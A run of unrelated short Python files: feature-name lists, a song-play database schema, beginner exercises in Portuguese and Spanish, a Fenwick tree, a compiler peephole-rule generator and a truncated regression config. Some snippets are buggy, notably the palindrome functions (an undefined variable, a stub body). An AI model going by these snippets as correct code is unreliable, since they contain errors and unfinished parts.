"feature_hydrologic_cymric_nyctophobia", "feature_beady_unkind_barret", "feature_discrepant_ventral_shicker", "feature_sallowish_cognisant_romaunt", "feature_castrated_presented_quizzer", "feature_bushwhacking_unaligned_imperturbability", "feature_covalent_unreformed_frogbit", "feature_revitalizing_dashing_photomultiplier", "feature_flakiest_fleecy_novelese", "feature_refreshed_untombed_skinhead", "feature_scorbutic_intellectualism_mongoloid", "feature_commensurable_industrial_jungfrau", "feature_expressed_abhominable_pruning", "feature_extractable_serrulate_swing", "feature_instrumentalist_extrovert_cassini", "feature_alkaline_pistachio_sunstone", "feature_plexiform_won_elk", "feature_caressive_cognate_cubature", "feature_voltairean_dyslogistic_epagoge", "feature_leggiest_slaggiest_inez", "feature_whopping_eminent_attempter", "feature_sixteen_inbreed_are", "feature_designer_notchy_epiploon", "feature_croupiest_shaded_thermotropism", "feature_amygdaloidal_intersectional_canonry", "feature_busty_unfitted_keratotomy", "feature_log_unregenerate_babel", "feature_farcical_spinal_samantha", "feature_unburied_exponent_pace", "feature_dentilingual_removed_osmometer", "feature_arillate_nickelic_hemorrhage", "feature_restricted_aggregately_workmanship", "feature_ganoid_osiered_mineralogy", "feature_introvert_symphysial_assegai", "feature_sludgy_implemental_sicily", "feature_criticisable_authentical_deprecation", "feature_inhabited_pettier_veinlet", "feature_confiscatory_triennial_pelting", "feature_leisurable_dehortatory_pretoria", "feature_favoring_prescript_unorthodoxy", "feature_curling_aurorean_iseult", "feature_hibernating_soritic_croupe", "feature_spookiest_expedite_overnighter", "feature_foamy_undrilled_glaciology", "feature_uncurtailed_translucid_coccid", "feature_limitable_astable_physiology", "feature_assenting_darn_arthropod", "feature_terrific_epigamic_affectivity", "feature_inflexed_lamaism_crit", "feature_indentured_communicant_tulipomania", "feature_uncharged_unovercome_smolder", "feature_decent_solo_stickup", "feature_polaroid_squalliest_applause", "feature_interrogatory_isohyetal_atacamite", "feature_covalent_methodological_brash", "feature_undrossy_serpentiform_sack", "feature_faltering_tergal_tip", "feature_undirected_perdu_ylem", "feature_vulcanological_sepulchral_spean", ] FEATURE_NAMES_SMALL = [ "feature_unwonted_trusted_fixative", "feature_introvert_symphysial_assegai", "feature_jerkwater_eustatic_electrocardiograph", "feature_canalicular_peeling_lilienthal", "feature_unvaried_social_bangkok", "feature_crowning_frustrate_kampala", "feature_store_apteral_isocheim", "feature_haziest_lifelike_horseback", "feature_grandmotherly_circumnavigable_homonymity", "feature_assenting_darn_arthropod", "feature_beery_somatologic_elimination", "feature_cambial_bigoted_bacterioid", "feature_unaired_operose_lactoprotein", "feature_moralistic_heartier_typhoid", "feature_twisty_adequate_minutia", "feature_unsealed_suffixal_babar", "feature_planned_superimposed_bend", "feature_winsome_irreproachable_milkfish", "feature_flintier_enslaved_borsch", "feature_agile_unrespited_gaucho", "feature_glare_factional_assessment", "feature_slack_calefacient_tableau", "feature_undivorced_unsatisfying_praetorium", "feature_silver_handworked_scauper", "feature_communicatory_unrecommended_velure", "feature_stylistic_honduran_comprador", "feature_travelled_semipermeable_perruquier", "feature_bhutan_imagism_dolerite", "feature_lofty_acceptable_challenge", "feature_antichristian_slangiest_idyllist", "feature_apomictical_motorized_vaporisation", "feature_buxom_curtained_sienna", "feature_gullable_sanguine_incongruity", "feature_unforbidden_highbrow_kafir", "feature_chuffier_analectic_conchiolin", "feature_branched_dilatory_sunbelt", "feature_univalve_abdicant_distrail", "feature_exorbitant_myeloid_crinkle", ] FEATURE_NAMES_MEDIUM = [ "feature_dichasial_hammier_spawner", "feature_rheumy_epistemic_prancer", "feature_pert_performative_hormuz", "feature_hillier_unpitied_theobromine", "feature_perigean_bewitching_thruster", "feature_renegade_undomestic_milord", "feature_koranic_rude_corf", "feature_demisable_expiring_millepede", "feature_unscheduled_malignant_shingling", "feature_clawed_unwept_adaptability", "feature_rubblier_chlorotic_stogy", "feature_untumbled_histologic_inion", "feature_piffling_inflamed_jupiter", "feature_abstersive_emotional_misinterpreter", "feature_unluckiest_mulley_benzyl", "feature_escutcheoned_timocratic_kotwal", "feature_integrated_extroversive_ambivalence", "feature_vedic_mitral_swiz", "feature_reclaimed_fallibilist_turpentine", "feature_gone_honduran_worshipper", "feature_insociable_exultant_tatum", "feature_outdated_tapered_speciation", "feature_leggiest_slaggiest_inez", "feature_chaldean_vixenly_propylite", "feature_hysteric_mechanized_recklinghausen", "feature_glare_factional_assessment", "feature_highland_eocene_berean", "feature_seemlier_reorient_monandry", "feature_expressed_abhominable_pruning", "feature_castrated_presented_quizzer", "feature_restricted_aggregately_workmanship", "feature_scorbutic_intellectualism_mongoloid", "feature_telephonic_shakable_bollock", "feature_subglobular_unsalable_patzer", "feature_syrian_coital_counterproof", "feature_supergene_legible_antarthritic", "feature_hypothetic_distressing_endemic", "feature_torturesome_estimable_preferrer", "feature_greedier_favorable_enthymeme", "feature_decent_solo_stickup", "feature_unmalleable_resistant_kingston", "feature_seamier_jansenism_inflator", "feature_lordly_lamellicorn_buxtehude", "feature_mattery_past_moro", "feature_helpable_chanciest_fractionisation", "feature_spookiest_expedite_overnighter", "feature_culinary_pro_offering", "feature_ganoid_osiered_mineralogy", "feature_hotfoot_behaviorist_terylene", "feature_severe_tricky_pinochle", "feature_maximal_unobserving_desalinisation", "feature_voltairean_consolidative_parallel", "feature_unmoved_alt_spoonerism", "feature_tittering_virgilian_decliner", "feature_methylated_necrophilic_serendipity", "feature_calceolate_pudgy_armure", "feature_unsparing_moralistic_commissary", "feature_criticisable_authentical_deprecation", "feature_undetermined_idle_aftergrowth", "feature_antipathetical_terrorful_ife", "feature_caressive_cognate_cubature", "feature_crablike_panniered_gloating", "feature_exacerbating_presentationism_apagoge", "feature_epicurean_fetal_seising", "feature_casuistic_barbarian_monochromy", "feature_haematoid_runaway_nightjar", "feature_croupiest_shaded_thermotropism", "feature_zarathustrian_albigensian_itch", "feature_unsparred_scarabaeid_anthologist", "feature_unco_terefah_thirster", "feature_sallowish_cognisant_romaunt", "feature_grazed_blameful_desiderative", "feature_whitened_remanent_blast", "feature_introvert_symphysial_assegai", "feature_casemated_ibsenian_grantee", "feature_intertwined_leeriest_suffragette", "feature_built_reincarnate_sherbet", "feature_axillary_reluctant_shorty", "feature_descendent_decanal_hon", "feature_untrimmed_monaxial_accompanist", "feature_desiderative_commiserative_epizoa", "feature_subdued_spiffier_kano", "feature_affricative_bromic_raftsman", "feature_doggish_whacking_headscarf", "feature_congenital_conched_perithecium", "feature_terrific_epigamic_affectivity", "feature_enlightening_mirthful_laurencin", "feature_continuate_unprocurable_haversine", "feature_fustiest_voiced_janet", "feature_ovular_powered_neckar", "feature_questionable_diplex_caesarist", "feature_nubblier_plosive_deepening", "feature_revitalizing_dashing_photomultiplier", "feature_chafed_undenominational_backstitch", "feature_assenting_darn_arthropod", "feature_consecrate_legislative_cavitation", "feature_inhabited_pettier_veinlet", "feature_voltairean_dyslogistic_epagoge", "feature_log_unregenerate_babel", "feature_agile_unrespited_gaucho", "feature_whopping_eminent_attempter", "feature_travelled_semipermeable_perruquier", "feature_horizontal_snug_description", "feature_inhibited_snowiest_drawing", "feature_salian_suggested_ephemeron", "feature_diverticular_punjabi_matronship", "feature_reminiscent_unpained_ukulele", "feature_unsurveyed_chopped_feldspathoid", "feature_degenerate_officinal_feasibility", "feature_undrossy_serpentiform_sack", "feature_festering_controvertible_hostler", "feature_leukemic_paler_millikan", "feature_subapostolic_dungy_fermion", "feature_wale_planned_tolstoy", "feature_bifacial_hexastyle_hemialgia", "feature_revealable_aeonian_elvira", "feature_perceivable_gasiform_psammite", "feature_smugger_hydroponic_farnesol", "feature_apostate_impercipient_knighthood", "feature_unperfect_implemental_cellarage", "feature_stereotypic_ebracteate_louise", "feature_offshore_defamatory_catalog", "feature_tribal_germinable_yarraman", "feature_dispiriting_araeostyle_jersey", "feature_clerkish_flowing_chapati", "feature_venatic_intermetallic_darling", "feature_nebule_barmier_bibliomania", "feature_unknown_reusable_cabbage", "feature_planar_unessential_bride", "feature_irritant_euphuistic_weka", "feature_whistleable_unbedimmed_chokey", "feature_roiling_trimeric_kurosawa", "feature_loyal_fishy_pith", "feature_unlivable_morbific_traveling", "feature_untellable_penal_allegorization", "feature_coordinated_undecipherable_gag", "feature_congealed_lee_steek", "feature_intrusive_effluent_hokkaido", "feature_epidermic_scruffiest_prosperity", "feature_quadratic_untouched_liberty", "feature_hypogastric_effectual_sunlight", "feature_contused_festal_geochemistry", "feature_hexametric_ventricose_limnology", "feature_paramagnetic_complex_gish", "feature_chuffier_analectic_conchiolin", "feature_indefatigable_enterprising_calf", "feature_untouchable_unsolvable_agouti", "feature_reduplicate_conoid_albite", "feature_sixteen_inbreed_are", "feature_dovetailed_winy_hanaper", "feature_bushwhacking_unaligned_imperturbability", "feature_undescribed_methylic_friday", "feature_inflexed_lamaism_crit", "feature_calefactive_anapaestic_jerome", "feature_agronomic_cryptal_advisor", "feature_unbreakable_nosological_comedian", "feature_unmodernized_vasodilator_galenist", "feature_paraffinoid_irreplevisable_ombu", "feature_invalid_extortionary_titillation", "feature_fake_trident_agitator", "feature_wieldable_defiled_aperitive", "feature_contaminative_intrusive_tagrag", "feature_himyarite_tetragonal_deceit", "feature_tossing_denominative_threshing", "feature_dendritic_prothallium_sweeper", "feature_ruffianly_uncommercial_anatole", "feature_hellenistic_scraggly_comfort", "feature_squishiest_unsectarian_support", "feature_myographic_gawkier_timbale", "feature_faltering_tergal_tip", "feature_antisubmarine_foregoing_cryosurgery", "feature_altern_unnoticed_impregnation", "feature_foamy_undrilled_glaciology", "feature_appraisive_anagrammatical_tentacle", "feature_emmetropic_heraclitean_conducting", "feature_collective_stigmatic_handfasting", "feature_iridic_unpropertied_spline", "feature_farcical_spinal_samantha", "feature_urochordal_swallowed_curn", "feature_wombed_reverberatory_colourer", "feature_merovingian_tenebrism_hartshorn", "feature_stylistic_honduran_comprador", "feature_caecilian_unexperienced_ova", "feature_fumarolic_known_sharkskin", "feature_belgravian_salopian_sheugh", "feature_zymotic_varnished_mulga", "feature_learned_claustral_quiddity", "feature_brickier_heterostyled_scrutiny", "feature_unnetted_bay_premillennialist", "feature_uncurtailed_translucid_coccid", "feature_jiggish_tritheist_probity", "feature_groggy_undescried_geosphere", "feature_hawkish_domiciliary_duramen", "feature_base_ingrain_calligrapher", "feature_accessorial_aroused_crochet", "feature_fierier_goofier_follicle", "feature_unburied_exponent_pace", "feature_chelonian_pyknic_delphi", "feature_tarry_meet_chapel", "feature_generative_honorific_tughrik", "feature_smoggy_niftiest_lunch", "feature_coalier_typhoid_muntin", "feature_chopfallen_fasciate_orchidologist", "feature_euterpean_frazzled_williamsburg", "feature_quinsied_increased_braincase", "feature_unlawful_superintendent_brunet", "feature_naval_edified_decarbonize", "feature_scenic_cormophytic_bilirubin", "feature_unvaried_social_bangkok", "feature_fissirostral_multifoliate_chillon", "feature_gutta_exploitive_simpson", "feature_assertive_worsened_scarper", "feature_intersubjective_juristic_sagebrush", "feature_rowable_unshod_noise", "feature_volitional_ascensive_selfhood", "feature_barest_kempt_crowd", "feature_curtained_gushier_tranquilizer", "feature_intermontane_vertical_moo", "feature_isotopic_hymenial_starwort", "feature_inseminated_filarial_mesoderm", "feature_passerine_ultraist_neon", "feature_westering_immunosuppressive_crapaud", "feature_reported_slimy_rhapsody", "feature_juvenalian_paunchy_uniformitarianism", "feature_lipogrammatic_blowsier_seismometry", "feature_draconic_contractible_romper", "feature_indirect_concrete_canaille", "feature_puberulent_nondescript_laparoscope", "feature_unsurveyed_boyish_aleph", "feature_dismaying_chaldean_tallith", "feature_epitaxial_loathsome_essen", "feature_malagasy_abounding_circumciser", "feature_tortured_arsenical_arable", "feature_sludgy_implemental_sicily", "feature_uretic_seral_decoding", "feature_roasting_slaked_reposition", "feature_peculiar_sheenier_quintal", "feature_publishable_apiarian_rollick", "feature_interdental_mongolian_anarchism", "feature_reserved_cleanable_soldan", "feature_eruptive_seasoned_pharmacognosy", "feature_softish_unseparated_caudex", "feature_univalve_abdicant_distrail", "feature_levigate_kindly_dyspareunia", "feature_intercalative_helvetian_infirmarian", "feature_centric_shaggier_cranko", "feature_unliving_bit_bengaline", "feature_misanthropic_knurliest_freebooty", "feature_confiscatory_triennial_pelting", "feature_peltate_okay_info", "feature_reconciling_dauby_database", "feature_unspotted_practiced_gland", "feature_iconomatic_boozier_age", "feature_congenial_transmigrant_isobel", "feature_impractical_endorsed_tide", "feature_huskiest_compartmental_jacquerie", "feature_cairned_fumiest_ordaining", "feature_calculating_unenchanted_microscopium", "feature_mucky_loanable_gastrostomy", "feature_loricate_cryptocrystalline_ethnology", "feature_ctenoid_moaning_fontainebleau", "feature_armoured_finable_skywriter", "feature_intended_involute_highbinder", "feature_commensurable_industrial_jungfrau", "feature_spagyric_echt_alum", "feature_illiterate_stomachal_terpene", "feature_demure_groutiest_housedog", "feature_dentilingual_removed_osmometer", "feature_plexiform_won_elk", "feature_induplicate_hoarse_disbursement", "feature_vizierial_courtlier_hampton", "feature_lost_quirky_botel", "feature_hydrologic_cymric_nyctophobia", "feature_atlantic_uveal_incommunicability", "feature_incommensurable_diffused_curability", "feature_midget_noncognizable_plenary", "feature_unapplicable_jerkiest_klemperer", "feature_unamazed_tumular_photomicrograph", "feature_nucleophilic_uremic_endogen", "feature_unnourishing_indiscreet_occiput", "feature_hypersonic_volcanological_footwear", "feature_uncomplimentary_malignant_scoff", "feature_interrogatory_isohyetal_atacamite", "feature_invalid_chromatographic_cornishman", "feature_encompassing_skeptical_salience", "feature_beady_unkind_barret", "feature_gossamer_placable_wycliffite", "feature_flavourful_seismic_erica", "feature_petitionary_evanescent_diallage", "feature_leisurable_dehortatory_pretoria", "feature_chaotic_granitoid_theist", "feature_cerebrovascular_weeny_advocate", "feature_cyrenaic_unschooled_silurian", "feature_uninclosed_handcrafted_springing", "feature_indentured_communicant_tulipomania", "feature_synoptic_botryose_earthwork", "feature_acerb_venusian_piety", "feature_vestmental_hoofed_transpose", "feature_unrated_intact_balmoral", "feature_tonal_graptolitic_corsac", "feature_refreshed_untombed_skinhead", "feature_communicatory_unrecommended_velure", "feature_sudsy_polymeric_posteriority", "feature_inexpugnable_gleg_candelilla", "feature_headhunting_unsatisfied_phenomena", "feature_scenographical_dissentient_trek", "feature_trim_axial_suffocation", "feature_buxom_curtained_sienna", "feature_recidivism_petitory_methyltestosterone", "feature_irresponsive_compositive_ramson", "feature_more_hindoo_diageotropism", "feature_apomictical_motorized_vaporisation", "feature_seclusive_emendatory_plangency", "feature_discrepant_ventral_shicker", "feature_obeisant_vicarial_passibility", "feature_unrelieved_rawish_cement", "feature_strychnic_structuralist_chital", "feature_unaimed_yonder_filmland", "feature_designer_notchy_epiploon", "feature_favoring_prescript_unorthodoxy", "feature_cheering_protonemal_herd", "feature_conjugal_postvocalic_rowe", "feature_palmy_superfluid_argyrodite", "feature_outsized_admonishing_errantry", "feature_brawny_confocal_frail", "feature_arillate_nickelic_hemorrhage", "feature_bloodied_twinkling_andante", "feature_rusted_unassisting_menaquinone", "feature_biannual_maleficent_thack", "feature_extractable_serrulate_swing", "feature_covalent_methodological_brash", "feature_periscopic_thirteenth_cartage", "feature_tranquilizing_abashed_glyceria", "feature_faustian_unventilated_lackluster", "feature_frequentative_participial_waft", "feature_flakiest_fleecy_novelese", "feature_liege_unexercised_ennoblement", "feature_amygdaloidal_intersectional_canonry", "feature_rural_inquisitional_trotline", "feature_caespitose_unverifiable_intent", "feature_precooled_inoperable_credence", "feature_ruthenian_uncluttered_vocalizing", "feature_camphorated_spry_freemartin", "feature_mined_game_curse", "feature_amoebaean_wolfish_heeler", "feature_peaty_vulgar_branchia", "feature_ratlike_matrilinear_collapsability", "feature_attuned_southward_heckle", "feature_substandard_permissible_paresthesia", "feature_curling_aurorean_iseult", "feature_fleshly_bedimmed_enfacement", "feature_hendecagonal_deathly_stiver", "feature_massed_nonracial_ecclesiologist", "feature_instrumentalist_extrovert_cassini", "feature_patristical_analysable_langouste", "feature_gullable_sanguine_incongruity", "feature_phellogenetic_vibrational_jocelyn", "feature_autodidactic_gnarlier_pericardium", "feature_unbeaten_orological_dentin", "feature_resuscitative_communicable_brede", "feature_limitable_astable_physiology", "feature_chartered_conceptual_spitting", "feature_oversea_permed_insulter", "feature_busty_unfitted_keratotomy", "feature_alkaline_pistachio_sunstone", "feature_incitant_trochoidal_oculist", "feature_stelar_balmiest_pellitory", "feature_hypermetropic_unsighted_forsyth", "feature_calycled_living_birmingham", "feature_transmontane_clerkly_value", "feature_together_suppositive_aster", "feature_planned_superimposed_bend", "feature_undirected_perdu_ylem", "feature_antipodal_unable_thievery", "feature_scrobiculate_unexcitable_alder", "feature_apophthegmatical_catechetical_millet", "feature_fragrant_fifteen_brian", "feature_churrigueresque_talc_archaicism", "feature_uncompromising_fancy_kyle", "feature_retinoscopy_flinty_wool", "feature_pansophic_merino_pintado", "feature_galvanometric_sturdied_billingsgate", "feature_mazy_superrefined_punishment", "feature_aztecan_encomiastic_pitcherful", "feature_sorted_ignitable_sagitta", "feature_padded_peripteral_pericranium", "feature_trabeate_eutherian_valedictory", "feature_undisguised_whatever_gaul", "feature_migrant_reliable_chirurgery", "feature_permanent_cottony_ballpen", "feature_conceding_ingrate_tablespoonful", "feature_vulcanological_sepulchral_spean", "feature_unrequired_waxing_skeptic", "feature_hibernating_soritic_croupe", "feature_unstacked_trackable_blizzard", "feature_multilinear_sharpened_mouse", "feature_autarkic_constabulary_dukedom", "feature_christadelphian_euclidean_boon", "feature_covalent_unreformed_frogbit", "feature_basaltic_arid_scallion", "feature_uncharged_unovercome_smolder", "feature_leaky_maroon_pyrometry", "feature_polaroid_squalliest_applause", "feature_jerkwater_eustatic_electrocardiograph", "feature_malacological_differential_defeated", "feature_ambisexual_boiled_blunderer", "feature_endangered_unthreaded_firebrick", "feature_unextinct_smectic_isa", "feature_kerygmatic_splashed_ziegfeld", "feature_palatalized_unsucceeded_induration", "feature_springlike_crackjaw_bheesty", "feature_unweary_congolese_captain", "feature_uncertified_myrmecological_nagger", "feature_hemispherical_unabsolved_aeolipile", "feature_glyptic_unrubbed_holloway", "feature_rimmed_conditional_archipelago", "feature_bleeding_arabesque_pneuma", "feature_dipped_sent_giuseppe", "feature_undivorced_unsatisfying_praetorium", "feature_reclinate_cruciform_lilo", ] COLUMN_NAMES_LEGACY = FEATURE_NAMES_LEGACY + TARGET_NAMES COLUMN_NAMES_SMALL = FEATURE_NAMES_SMALL + TARGET_NAMES COLUMN_NAMES_MEDIUM = FEATURE_NAMES_MEDIUM + TARGET_NAMES
def letUsCalculate(): print("Where n is the number of ELEMENTS in the SET, and R is the samples taken in the function\n") print("///////////////////////////////\n") print("///////////////////////////////\n") print("///////////////////////////////\n") print("///////////////////////////////\n") print("NOW.... LET US CALCULATE!!!\n")
n=int(input('Numero:\n')) i=1 while(i*i<=n): i=i+1 print('La parte entera de la raiz cuadrada es: '+str(i-1))
# Drop Tables songplay_table_drop = "DROP TABLE IF EXISTS songplays" user_table_drop = "DROP TABLE IF EXISTS users" song_table_drop = "DROP TABLE IF EXISTS songs" artist_table_drop = "DROP TABLE IF EXISTS artists" time_table_drop = "DROP TABLE IF EXISTS time" # Create Tables songplay_table_create =(""" CREATE TABLE IF NOT EXISTS songplays ( songplay_id INT PRIMARY KEY, start_time TIMESTAMP NOT NULL, user_id INT NOT NULL, level VARCHAR(10) NOT NULL, song_id VARCHAR(100), artist_id VARCHAR(100), session_id INT NOT NULL, location VARCHAR(256), user_agent VARCHAR ); COMMENT ON COLUMN songplays.songplay_id is 'AutoIncrement Column'; COMMENT ON COLUMN songplays.user_agent is 'No Specified limit for Headers according to HTTP specification. Web servers do have the limit and vary.'; """) user_table_create = (""" CREATE TABLE IF NOT EXISTS users ( user_id INT PRIMARY KEY, first_name VARCHAR(100) NOT NULL, last_name VARCHAR(100) NOT NULL, gender VARCHAR(1) NOT NULL, level VARCHAR(20) NOT NULL ); """) song_table_create = (""" CREATE TABLE IF NOT EXISTS songs ( song_id VARCHAR(100) PRIMARY KEY, title VARCHAR(256) NOT NULL, artist_id VARCHAR(100) NOT NULL, year SMALLINT, duration NUMERIC ); """) artist_table_create = (""" CREATE TABLE IF NOT EXISTS artists ( artist_id VARCHAR(100) PRIMARY KEY, name VARCHAR(256) NOT NULL, location VARCHAR(256), latitude NUMERIC, longitude NUMERIC ); """) time_table_create = (""" CREATE TABLE IF NOT EXISTS time ( start_time TIMESTAMP PRIMARY KEY, hour SMALLINT NOT NULL, day SMALLINT NOT NULL, week SMALLINT NOT NULL, month SMALLINT NOT NULL, year SMALLINT NOT NULL, weekday SMALLINT NOT NULL ); COMMENT ON COLUMN time.start_time is 'The value of log.ts'; """) # Insert Records songplay_table_insert = (""" INSERT INTO songplays (songplay_id, start_time, user_id, level, song_id, artist_id, session_id, location, user_agent) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT (songplay_id) DO NOTHING; """) user_table_insert = (""" INSERT INTO users(user_id, first_name, last_name, gender, level) VALUES(%s, %s, %s, %s, %s) ON CONFLICT (user_id) DO UPDATE SET first_name = EXCLUDED.first_name, last_name = EXCLUDED.last_name, gender = EXCLUDED.gender, level = EXCLUDED.level; """) song_table_insert = (""" INSERT INTO songs(song_id, title, artist_id, year, duration) VALUES(%s, %s, %s, %s, %s) ON CONFLICT (song_id) DO UPDATE SET title = EXCLUDED.title, artist_id = EXCLUDED.artist_id, year = EXCLUDED.year, duration = EXCLUDED.duration; """) artist_table_insert = (""" INSERT INTO artists(artist_id, name, location, latitude, longitude) VALUES(%s, %s, %s, %s, %s) ON CONFLICT (artist_id) DO UPDATE SET name = EXCLUDED.name, location = EXCLUDED.location, latitude = EXCLUDED.latitude, longitude = EXCLUDED.longitude; """) time_table_insert = (""" INSERT INTO time(start_time, hour, day, week, month, year, weekday) VALUES(%s, %s, %s, %s, %s, %s, %s) ON CONFLICT (start_time) DO NOTHING; """) # Find songs song_select = (""" SELECT songs.song_id, artists.artist_id FROM songs JOIN artists ON songs.artist_id = artists.artist_id WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s; """) # Analysis user activities for listening music analysis_most_popular_song = (""" SELECT songs.title AS "Song Title", artists.name AS "Artist Name" FROM ( songs JOIN artists ON songs.artist_id = artists.artist_id ) WHERE songs.song_id = ( SELECT songplays.song_id FROM ( songplays JOIN time ON songplays.start_time = time.start_time ) WHERE time.year = %s GROUP BY songplays.song_id ORDER BY COUNT(songplays.song_id) DESC LIMIT 1 ); """) analysis_most_popular_artist = (""" SELECT artists.name AS "Artist Name", artists.location AS "Location" FROM artists WHERE artists.artist_id = ( SELECT songplays.artist_id FROM ( songplays JOIN time ON songplays.start_time = time.start_time ) WHERE time.year = %s GROUP BY songplays.artist_id ORDER BY COUNT(songplays.artist_id) DESC LIMIT 1 ); """) analysis_mean_number_on_different_level = (""" SELECT users.level AS "User Level", CAST(AVG(total.count) AS DECIMAL(10,2)) as "Avarage Number of Songs" FROM users JOIN ( SELECT songplays.user_id AS id, COUNT(songplays.user_id) AS count FROM ( songplays JOIN time ON songplays.start_time = time.start_time ) WHERE time.year = %s GROUP BY songplays.user_id ORDER BY count DESC ) AS total ON users.user_id = total.id GROUP BY users.level; """) # QUERY LISTS create_table_queries = [songplay_table_create, user_table_create, song_table_create, artist_table_create, time_table_create] drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop]
dados = [] lista = [] maior = menor = 0 while True: lista.append(str(input('Digite um nome: '))) lista.append(float(input('Digite seu peso: '))) while True: escol = str(input('Quer continuar?[S/N] ')).upper().split()[0] if escol in 'SN': break dados.append(lista[:]) lista.clear() if escol in 'N': break print('-='*30) print(f'{len(dados)} pessoas foram cadastradas.') for c in dados: if maior == 0 or c[1] > maior: maior = c[1] if menor == 0 or c[1] < menor: menor = c[1] print(f'O maior peso foi de {maior:.1f}Kg. Peso de ', end='') for i in dados: if i[1] == maior: print(f'[{i[0]}]', end=' ') print('\n') print(f'O menor peso foi de {menor:.1f}Kg. Peso de ', end='') for a in dados: if a[1] == menor: print(f'[{a[0]}]', end='')
class Bit: def __init__(self, n): self.size = n self.tree = [0] * (n + 1) def sum(self, i): s = 0 while i > 0: s += self.tree[i] i -= i & -i return s def add(self, i, x): while i <= self.size: self.tree[i] += x i += i & -i def main(): N = 5 bit = Bit(N) bit.add(1, 2) bit.add(2, 3) bit.add(3, 8) bit.add(1, 1) print(bit.sum(2)) print(bit.sum(3)) if __name__ == '__main__': main()
""" Given a string s, find the longest palindromic substring in it. I/P : "babad" O/P : "bab" "aba" is also a valid answer I/P: "cbbd" O/P: "bb """ # Approach 0 - get all possible substrings and check for palindrome. # Approach 1: Using sliding window - Expanding around the center """ The core logic in this is: 1. Keep one-pointer from the start of the string 2. Keep second-pointer from the end of the string 3. Because you are starting from reverse """ def longest_palindromic_substring(string): result = [] for i in range(len(string)): for j in range(len(string), i, -1): if len(result) > j - i: # This means we have found it. break elif string[i:j] == string[i:j][::-1]: result = string[i:j] break return result def longest_palindromic_substring_bruteforce(string): best = "" for left in range(len(string)): for right in range(left, len(string)): substring = s[left : right + 1] if substring == substring[::-1] and len(substring) > len(best): best = substring return best # remember if there is more than one odd - the palindrome cannot be formed. # This solution is through DP O(n^2) def longest_palindromic_substring_expand_center(string): pass if __name__ == "__main__": s = "" result = longest_palindromic_substring_expand_center(s) print(result)
def print_rules(bit): rules = [] # Bit Toggle rules.append(( "// REG ^= (1 << %d)" % bit, "replace restart {", " ld a, %1", " xor a, #%s" % format((1 << bit) & 0xff, '#04x'), " ld %1, a", "} by {", " bcpl %%1, #%d ; peephole replaced xor by bcpl." % bit, "} if notUsed('a')")) # Bit Set rules.append(( "// REG |= (1 << %d)" % bit, "replace restart {", " ld a, %1", " or a, #%s" % format((1 << bit) & 0xff, '#04x'), " ld %1, a", "} by {", " bset %%1, #%d ; peephole replaced or by bset." % bit, "} if notUsed('a')")) # Bit Reset rules.append(( "// REG &= ~(1 << %d)" % bit, "replace restart {", " ld a, %1", " and a, #%s" % format(~(1 << bit) & 0xff, '#04x'), " ld %1, a", "} by {", " bres %%1, #%d ; peephole replaced and by bres." % bit, "} if notUsed('a')")) for r in rules: print ('\n'.join(r) + '\n') print('// Extra rules generated by rules_gen.py') for i in range(8): print_rules(i)
class RedirectException(Exception): def __init__(self, redirect_to: str): super().__init__() self.redirect_to = redirect_to
AMAZON_COM: str = "https://www.amazon.com/" DBA_DK: str = "https://www.dba.dk/" EXAMPLE_COM: str = "http://example.com/" GOOGLE_COM: str = "https://www.google.com/" JYLLANDSPOSTEN_DK: str = "https://jyllands-posten.dk/" IANA_ORG: str = "https://www.iana.org/domains/reserved" W3SCHOOLS_COM: str = "https://www.w3schools.com/"
v = float(input('Qual a velocidade atual do carro? ')) if v > 80: print('MULTADO! Você excedeu o limite pertimido que é 80km/h') m = (v - 80) * 7 print('Você deve pagar um multa de {:.2f}'.format(m)) print('Você terá que pagar {}') print('Tenha um bom dia! Dirija com segurança!')
#o objetivo desse algorítimo é ler o primeiro nome da cidade e falar se o primeiro # nome corresponde ao solicitado cidade = str(input('Qual o nome da cidade que você nasceu? ')).strip() print(cidade[:5].upper() == 'SANTO')
def read_file_to_string(filename): with open(filename, 'r') as fin: return fin.read() def write_string_to_file(filename, content): with open(filename, 'w') as fout: fout.write(content)
class SongLine: # Uniquely ids all song lines next_id = 0 def __init__(self, song_text: str, song): """A song line of a song :type song_text: str :param song_text: The lines text :type song: Song.Song :param song: The song this line is a part of """ # Set unique id self.id = self.next_id SongLine.next_id += 1 # Setup the song line self._text = song_text self.song = song def get_text(self): """Get the lines song text :return str: The lines song text""" return self._text def __repr__(self): return self._text def __eq__(self, other_line): return self.id == other_line.id def __hash__(self): return self.id
# Coding up the SVM Quiz clf.fit(features_train, labels_train) pred = clf.predict(features_test)
# https://www.hackerrank.com/challenges/grading/problem def gradingStudents(grades): rounded = [] for g in grades: if (g < 38) or ((g % 5) < 3) : rounded.append(g) else: rounded.append(g + (5 - (g % 5))) return rounded
#!/usr/bin/env python # coding: utf-8 # In[3]: class ChineseChef: def make_chicken(self): print("The Chef makes Chicken") def make_salad(self): print("The Chef Makes Salad") def make_special_dish(self): print("The Chef makes Orange Chicken") def make_fried_rice(self): print("The Chef maked Fried Rice") # In[ ]:
Experiment(description='Multi d regression experiment', data_dir='../data/uci-regression', max_depth=20, random_order=False, k=1, debug=False, local_computation=False, n_rand=2, sd=2, jitter_sd=0.1, max_jobs=400, verbose=False, make_predictions=False, skip_complete=True, results_dir='../results/2014-04-21-uci-regression-restart/', iters=250, base_kernels='SE,Lin,Noise', random_seed=1, period_heuristic=3, max_period_heuristic=5, period_heuristic_type='min', subset=True, subset_size=250, full_iters=25, bundle_size=5, additive_form=True, mean='ff.MeanConst(c=39.2970002643)', # Starting mean kernel='ff.SumKernel(operands=[ff.NoiseKernel(sf=0.992564149134), ff.ProductKernel(operands=[ff.SqExpKernel(dimension=0, lengthscale=0.446413981842, sf=-0.172270499223), ff.SqExpKernel(dimension=6, lengthscale=1.52017941082, sf=1.90808679799)]), ff.ProductKernel(operands=[ff.SqExpKernel(dimension=0, lengthscale=6.26749787392, sf=2.42023059081), ff.SqExpKernel(dimension=1, lengthscale=6.07966455123, sf=1.33536670897), ff.SqExpKernel(dimension=3, lengthscale=3.78168500021, sf=-0.521535300832)]), ff.ProductKernel(operands=[ff.SqExpKernel(dimension=1, lengthscale=4.52193307207, sf=-2.83423935993), ff.SqExpKernel(dimension=3, lengthscale=-0.475114371177, sf=-1.30799230607), ff.SqExpKernel(dimension=7, lengthscale=-4.1220083947, sf=4.83400674575)]), ff.ProductKernel(operands=[ff.SqExpKernel(dimension=1, lengthscale=6.32403778175, 